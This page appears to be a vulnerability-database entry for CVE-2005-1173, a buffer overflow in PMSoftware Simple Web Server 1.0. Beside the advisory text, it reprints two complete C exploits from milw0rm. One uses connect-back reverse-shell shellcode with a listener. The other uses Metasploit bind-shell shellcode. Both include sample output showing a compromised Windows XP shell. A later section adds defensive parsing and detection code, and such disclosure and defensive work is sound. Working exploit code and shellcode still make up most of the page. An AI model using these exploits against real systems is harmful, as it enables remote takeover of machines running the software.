CVE-2005-1173
CVSS 7.5
Published: 2005-05-02 00:00:00
Revised: 2016-10-17 23:17:52

[Original] Buffer overflow in PMSoftware Simple Web Server 1.0 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD] PMSoftware Simple Web Server Remote Buffer Overflow Vulnerability (CNNVD-200505-175)

PMSoftware Simple Web Server 1.0 contains a buffer overflow; a remote attacker can execute arbitrary code via a long GET request.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1173
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1173
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-175
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111384806002021&w=2
(UNKNOWN)  BUGTRAQ  20050418 ERNW Security Advisory 01/2005

- Vulnerability information

PMSoftware Simple Web Server Remote Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
PMSoftware Simple Web Server 1.0 contains a buffer overflow; a remote attacker can execute arbitrary code via a long GET request.

- Advisories and patches

No data

- Vulnerability information (945)

PMSoftware Simple Web Server (GET Request) Remote BoF Exploit (EDBID:945)
windows remote
2005-04-24 Verified
80 cybertronic
N/A [Download]
/*
 *
 * PMSoftware Simple Web Server Buffer Overflow Exploit
 * 3 targets
 *
 * cybertronic[at]gmx[dot]net
 * 04/25/2005
 *               __              __                   _
 *   _______  __/ /_  ___  _____/ /__________  ____  (_)____
 *  / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
 * / /__/ /_/ / /_/ /  __/ /  / /_/ /  / /_/ / / / / / /__
 * \___/\__, /_.___/\___/_/   \__/_/   \____/_/ /_/_/\___/
 *     /____/
 *
 * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
 * Usage: ./PMSoftwareSimpleWebServer_expl -h <tip> -p <tport> -l <cbip> -c <cbport> -t <target>
 *         0 WinXP Home SP1 GER [0x71a17bfb] [pad=213] [offset=222]
 *         1 WinXP Prof SP1 GER [0x71a17bfb] [pad=216] [offset=225]
 *         2 WinXP Prof SP2 GER [0x71a19372] [pad=215] [offset=224]
 *
 * [ cybertronic @ PM ] $ ./PMSoftwareSimpleWebServer_expl -h 192.168.2.103 -p 80 -l 192.168.2.102 -c 1337 -t 1
 *
 * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
 * --[ connecting to 192.168.2.103:80...done!
 * --[ exploiting WinXP Pro SP1 GER
 * --[ ret: 0x71a17bfb [ jmp esp in ws2_32.dll ]
 * --[ sending GET request [ 543 bytes ]...done!
 * --[ starting reverse handler [port: 1337]...done!
 * --[ incomming connection from:  192.168.2.103
 * --[ b0x pwned - h4ve phun
 * Microsoft Windows XP [Version 5.1.2600]
 * (C) Copyright 1985-2001 Microsoft Corp.
 *
 * C:\PMSoftware>
 *
 */


#include <stdio.h>
#include <stdlib.h>      /* exit, atoi, strtoul, system */
#include <string.h>      /* memset, memcpy, strncat, strcat, strlen */
#include <strings.h>     /* bzero */
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr, inet_ntoa */
#include <netdb.h>
#include <unistd.h>

#define PORT 80

/* \033 is the portable escape; the original \E is a GCC-only extension */
#define RED		"\033[31m\033[1m"
#define GREEN	"\033[32m\033[1m"
#define YELLOW	"\033[33m\033[1m"
#define BLUE	"\033[34m\033[1m"
#define NORMAL	"\033[m"

/*
 *
 * prototypes
 *
 */

int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int targ );
int shell ( int s, char* tip, unsigned short cbport );

void header ();
void start_reverse_handler ( unsigned short cbport );
void usage ( char* name );

/*********************
* Windows Shellcode *
*********************/

/*
 * Type : connect back shellcode
 * Length: 316 bytes
 * CBIP : reverseshell[111] ( ^ 0x99999999 )
 * CBPort: reverseshell[118] ( ^ 0x9999 )
 *
 */

unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

/*
 *
 * structures
 *
 */

typedef struct _args {
	char* tip;
	char* lip;
    int tport;
	int lport;
	int target;
} args;

struct targets {
	int  num;
	char name[64];
	unsigned long ret;
	int padding;
	int offset;
}
target[]= {
	{ 0, "WinXP Home SP1 GER", 0x71a17bfb, 213, 222 },
	{ 1, "WinXP Prof SP1 GER", 0x71a17bfb, 216, 225 },
	{ 2, "WinXP Prof SP2 GER", 0x71a19372, 215, 224 } //works only in conjunction with SoftIce :: stack guard is disabled somehow
};

/*
 *
 * functions
 *
 */

int
connect_to_remote_host ( char* tip, unsigned short tport )
{
	int s;
	struct sockaddr_in remote_addr;
	struct hostent *host_addr;

    memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
    if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
	{
		printf ( "cannot resolve \"%s\"\n", tip );
		exit ( 1 );
	}
    remote_addr.sin_family = AF_INET;
    remote_addr.sin_port = htons ( tport );
    remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
    if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
		printf ( "socket failed!\n" );
		exit ( 1 );
	}
	printf ( "--[ connecting to %s:%u...", tip, tport  );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
	{
		printf ( "failed!\n" );
		exit ( 1 );
	}
	printf ( "done!\n" );
	return ( s );
}

int
exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int targ )
{
	char in[2048], request[1024];
	
	/* report the target actually selected rather than a hard-coded name */
	printf ( "--[ exploiting %s\n", target[targ].name );
	printf ( "--[ ret: 0x%08lx [ jmp esp in ws2_32.dll ]\n", target[targ].ret );
	
	memcpy ( &reverseshell[111], &xoredip, 4);
	memcpy ( &reverseshell[118], &xoredcbport, 2);
	
	bzero ( &request, sizeof ( request ) );
	request[0] = 0x47;
	request[1] = 0x45;
	request[2] = 0x54;
	request[3] = 0x20;
	request[4] = 0x2f;

	memset ( request + 5, 0x41, target[targ].padding );
	strncat ( request, ( const char* ) &target[targ].ret, 4 );
	memcpy ( request + target[targ].offset, reverseshell, sizeof ( reverseshell ) - 1 );
	strcat ( request, "\r\n" );

	printf ( "--[ sending GET request [ %zu bytes ]...", strlen ( request ) );
	if ( write ( s, request, strlen ( request ) ) <= 0 )
	{
		printf ( "failed!\n" );
		return ( 1 );
	}
	printf ( "done!\n" );
	return ( 0 );
}

int
shell ( int s, char* tip, unsigned short cbport )
{
	int n;
	char buffer[2048];
	fd_set fd_read;

	printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );

	FD_ZERO ( &fd_read );
	FD_SET ( s, &fd_read );
	FD_SET ( 0, &fd_read );

	while ( 1 )
	{
		FD_SET ( s, &fd_read );
		FD_SET ( 0, &fd_read );

		if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
			break;
		if ( FD_ISSET ( s, &fd_read ) )
		{
			/* 0 means the remote side closed the connection; leave the loop instead of spinning */
			if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) <= 0 )
			{
				printf ( "bye bye...\n" );
				return ( 0 );
			}
			if ( write ( 1, buffer, n ) < 0 )
			{
				printf ( "bye bye...\n" );
				return ( 0 );
			}
		}
		if ( FD_ISSET ( 0, &fd_read ) )
		{
			if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
			{
				printf ( "bye bye...\n" );
				return ( 0 );
			}
			if ( send ( s, buffer, n, 0 ) < 0 )
			{
				printf ( "bye bye...\n" );
				return ( 0 );
			}
		}
		usleep(10);
	}
	return ( 0 );
}

void
header ()
{
	printf ( "              __              __                   _           \n" );
	printf ( "  _______  __/ /_  ___  _____/ /__________  ____  (_)____      \n" );
	printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/  \n" );
	printf ( "/ /__/ /_/ / /_/ /  __/ /  / /_/ /  / /_/ / / / / / /__        \n" );
	printf ( "\\___/\\__, /_.___/\\___/_/   \\__/_/   \\____/_/ /_/_/\\___/  \n" );
	printf ( "    /____/                                                     \n\n" );
	printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}

void
parse_arguments ( int argc, char* argv[], args* argp )
{
	int i = 0;
	
	while ( ( i = getopt ( argc, argv, "h:p:l:c:t:" ) ) != -1 )
	{
		switch ( i )
		{
			case 'h':
				argp->tip = optarg;
				break;
			case 'p':
				argp->tport = atoi ( optarg );
				break;
			case 'l':
				argp->lip = optarg;
				break;
			case 'c':
                argp->lport = atoi ( optarg );
	            break;
			case 't':
                argp->target = strtoul ( optarg, NULL, 16 );
	            break;
			case ':':
			case '?':
			default:
				usage ( argv[0] );
	    }
    }

    if ( argp->tip == NULL || argp->tport < 1 || argp->tport > 65535 || argp->lip == NULL || argp->lport < 1 || argp->lport > 65535 ||  argp->target < 0 || argp->target > 2 )
		usage ( argv[0] );
}

void
start_reverse_handler ( unsigned short cbport )
{
	int s1, s2;
	struct sockaddr_in cliaddr, servaddr;
	socklen_t clilen = sizeof ( cliaddr );
	
	bzero ( &servaddr, sizeof ( servaddr ) );
	servaddr.sin_family = AF_INET;
	servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
	servaddr.sin_port = htons ( cbport );

	printf ( "--[ starting reverse handler [port: %u]...", cbport );
	if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
	{
		printf ( "socket failed!\n" );
		exit ( 1 );
	}
	if ( bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) ) == -1 )
	{
		printf ( "bind failed!\n" );
		exit ( 1 );
	}
	if ( listen ( s1, 1 ) == -1 )
	{
		printf ( "listen failed!\n" );
		exit ( 1 );
	}
	printf ( "done!\n" );
	if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
	{
		printf ( "accept failed!\n" );
		exit ( 1 );
	}
	close ( s1 );
	printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) );
	shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
	close ( s2 );
}

void
usage ( char* name )
{
	int i;

	printf ( "Usage: %s -h <tip> -p <tport> -l <cbip> -c <lport> -t <target>\n", name );
	for ( i = 0; i < 3; i++ )
		printf ( "\t%d %s [0x%08x] [pad=%d] [offset=%d]\n", target[i].num, target[i].name, target[i].ret, target[i].padding, target[i].offset );
    exit ( 1 );
}

int
main ( int argc, char* argv[] )
{
	int s;
	unsigned long xoredip;
	unsigned short xoredcbport;
	/* zero-initialised so the NULL and range checks in parse_arguments are meaningful */
	args myargs = { NULL, NULL, 0, 0, 0 };

	system ( "clear" );
	header ();
	parse_arguments ( argc, argv, &myargs );
	s = connect_to_remote_host ( myargs.tip, myargs.tport );
	
	xoredip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
	xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;

	if ( exploit ( s, xoredip, xoredcbport, myargs.target ) == 1 )
	{
		printf ( "exploitation FAILED!\n" );
		exit ( 1 );
	}
	start_reverse_handler ( myargs.lport );
	return ( 0 );
}


// milw0rm.com [2005-04-24]

- Vulnerability information (949)

PMsoftware Simple Web Server 1.0 Remote Stack Overflow Exploit (EDBID:949)
windows remote
2005-04-20 Verified
80 c0d3r
N/A [Download]
/*   
     PMsoftware mini http server remote stack overflow exploit
     author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com 
	 package : PMsoftware Web Server version 1.0
	 advisory : http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html
	 company address : www.pmx.it
	 timeline :
	 17 Feb 2005 : bug found by ERNW Security
     18 Apr 2005 : Public Disclosure 
     18 Apr 2005 : crash exploit released (ERNW Security)
	 20 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
	 compiled with visual c++ 6 : cl pm.c 
	 greetz : IHSTeam members,exploit-dev mates, securiteam , str0ke-milw0rm
	 ihsteam.com (persian) www.ihssecurity.com (english , just started)
     a big F*u to those who were/are/will trading konkoor questions-answers
	 (c) IHS security 2005
*/
/*
D:\projects>pm.exe 127.0.0.1 80 0

-------- PMSoftware web server remote overflow exploit by c0d3r

[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 680 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully try telnet 127.0.0.1 4444

D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\PMSoftware>DONE !
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 680

// 5 byte GET + 241 byte NOP junk + 4 byte return address (at offset 246)
// + 25 byte NOP (offsets 250-274) + 399 byte shellcode (at offset 275) + 6 trailing NOPs = 680

// using metasploit great shellcode LPORT=4444 Size=399 

unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
  
  
int rc, os;
SOCKET sock;            // socket() returns a SOCKET handle, not an unsigned int
unsigned long addr;     // inet_addr() result, compared against INADDR_NONE
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
char jmp_esp[5];
unsigned short port;
char GET[] = "\x47\x45\x54\x20\x2F";
char winxpsp1[] = "\xCC\x59\xFB\x77";
char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested
  
int main (int argc, char *argv[]){

  if(argc < 4) { // host, port and target are all required (argv[3] is read below)
    printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n");
    printf("-------- usage : pm.exe host port target\n");
    printf("-------- target 1 : windows xp service pack 1 : 0\n");
    printf("-------- target 2 : windows xp service pack 2 : 1\n");
    printf("-------- eg : pm.exe 127.0.0.1 80 0\n\n");
    exit(-1) ;
  }
  printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n\n");
  os = (unsigned short)atoi(argv[3]);
  switch(os)
  {
   case 0:
    // jmp_esp is never initialised, so strcat() on it was undefined; copy the 4 bytes plus NUL instead
    memcpy(jmp_esp,winxpsp1,sizeof(winxpsp1));
    break;
   case 1:
    memcpy(jmp_esp,winxpsp2,sizeof(winxpsp2)); // wasnt checked
    break;
   default:
    printf("\n[-] this target doesnt exist in the list\n\n");
    exit(-1);
  }
	
  // Creating heart of exploit code
  printf("[+] building overflow string");

  memset(buffer,NOP,size);
  memcpy(buffer,GET,sizeof(GET)-1);
  memcpy(buffer+246,jmp_esp,sizeof(jmp_esp)-1);
  memcpy(buffer+275,shellcode,sizeof(shellcode)-1);
  buffer[size-1] = 0; // terminate inside the array; buffer[size] was one past the end

  // EO heart of exploit code

  
  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !\n");
   exit(-1);
  }
  hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (sock == INVALID_SOCKET){ // socket() signals failure with INVALID_SOCKET, never 0
   printf("[-] socket() error...\n");
   exit(-1);
  }
  if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
   tcp.sin_family = AF_INET;
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("\n[+] attacking host %s\n" , argv[1]) ;

  Sleep(1000);

  printf("[+] packet size = %d byte\n" , (int)sizeof(buffer));

  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
     Sleep(1000) ;
     printf("[+] connected\n") ;
     printf("[+] sending the overflow string\n") ;
     if (send(sock,buffer,strlen(buffer),0) == SOCKET_ERROR)
       printf("[-] send() failed\n");
     else
       printf("[+] exploit sent successfully try telnet %s 4444\n" , argv[1]);
  }
  else {
      printf("[-] ouch! Server is not listening .... \n");
  }
  shutdown(sock,1);
  closesocket(sock);
  WSACleanup();
  return 0;
}
// EO exploit code

// milw0rm.com [2005-04-20]

- Vulnerability information

15667
Simple Web Server (SWS) GET Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in Simple Web Server. The application fails to perform proper bounds checking resulting in a buffer overflow. With an overly long GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-04-18 2005-02-17
2005-04-18 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

PMSoftware Simple Web Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 13227
Yes No
2005-04-18 12:00:00 2009-07-12 02:06:00
Michael Thumann <mthumann@ernw.de> is credited with the discovery of this issue.

- Affected program versions

PMSoftware Simple Web Server 1.0

- Vulnerability discussion

A remote buffer overflow vulnerability affects PMSoftware Simple Web Server. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.
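The discussion above names the bug class (no length check before copying a request string into a fixed buffer) but not the fix. The following C example is added here and is not code from the advisory, from PMSoftware, or from either exploit: it shows a bounded request-line parser that answers an over-long request target with an HTTP 414/400 status instead of copying it into the buffer, plus a simple log-side heuristic that flags request lines shaped like the public exploits (oversized and padded with a long run of one byte). The buffer sizes, thresholds and sample request lines are constructed assumptions, not values from the vulnerable server.

```c
#include <stdio.h>
#include <string.h>

#define URI_MAX     256   /* constructed: size of the server's fixed request-target buffer */
#define REQLINE_MAX 1024  /* constructed: hard cap on one request line */

enum { REQ_OK = 0, REQ_BAD = 400, REQ_TOO_LONG = 414 };

/* The vulnerable shape is "copy the request target into a fixed buffer with
 * no length check". This version checks every length before it copies, so an
 * over-long target produces a 414 status rather than a stack overwrite. */
int parse_request_line(const char *line, size_t len, char *uri, size_t uri_cap)
{
    if (len > REQLINE_MAX)                         /* reject before touching anything */
        return REQ_TOO_LONG;
    if (len < 5 || memcmp(line, "GET ", 4) != 0)
        return REQ_BAD;
    const char *tgt = line + 4;
    const char *sp  = memchr(tgt, ' ', len - 4);   /* end of target, if a version follows */
    size_t tlen = sp ? (size_t)(sp - tgt) : len - 4;
    while (tlen && (tgt[tlen - 1] == '\r' || tgt[tlen - 1] == '\n'))
        tlen--;                                    /* HTTP/0.9 style: no version, just CRLF */
    if (tlen == 0 || tgt[0] != '/')
        return REQ_BAD;
    if (tlen >= uri_cap)                           /* would not fit with its NUL: 414 */
        return REQ_TOO_LONG;
    memcpy(uri, tgt, tlen);
    uri[tlen] = '\0';
    return REQ_OK;
}

/* Log-side heuristic: an oversized request line whose bulk is one repeated
 * byte (padding such as 'A' or NOP runs) is worth an alert on this service. */
int looks_like_overflow_probe(const char *line, size_t len)
{
    size_t run = 1, longest = 1;
    if (len <= URI_MAX)
        return 0;
    for (size_t i = 1; i < len; i++) {
        run = (line[i] == line[i - 1]) ? run + 1 : 1;
        if (run > longest)
            longest = run;
    }
    return longest >= 64;                          /* constructed threshold */
}

int main(void)
{
    char uri[URI_MAX], probe[700];
    /* constructed sample: "GET /" followed by 600 'A's, the shape of the public exploits */
    memset(probe, 'A', sizeof probe);
    memcpy(probe, "GET /", 5);
    size_t plen = 5 + 600;
    int ok = parse_request_line("GET /index.html HTTP/1.0\r\n", 26, uri, sizeof uri);
    printf("normal request: status %d, uri %s\n", ok, uri);
    printf("padded request: status %d, flagged %d\n",
           parse_request_line(probe, plen, uri, sizeof uri),
           looks_like_overflow_probe(probe, plen));
    return 0;
}
```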

- Exploit

The following exploits have been provided:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's related websites.